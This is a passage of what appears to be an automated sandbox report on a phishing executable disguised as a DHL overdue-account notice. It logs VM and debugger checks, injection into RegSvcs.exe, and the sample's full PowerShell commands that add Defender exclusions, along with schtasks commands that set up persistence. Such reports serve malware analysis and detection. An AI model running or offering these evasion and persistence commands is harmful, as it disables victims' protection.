                      Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe"
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LJAGvecDW.exe"
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LJAGvecDW.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E1C008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D62008
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LJAGvecDW.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmp87CB.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmpA44C.tmp"
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeQueries volume information: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeQueries volume information: C:\Users\user\AppData\Roaming\LJAGvecDW.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
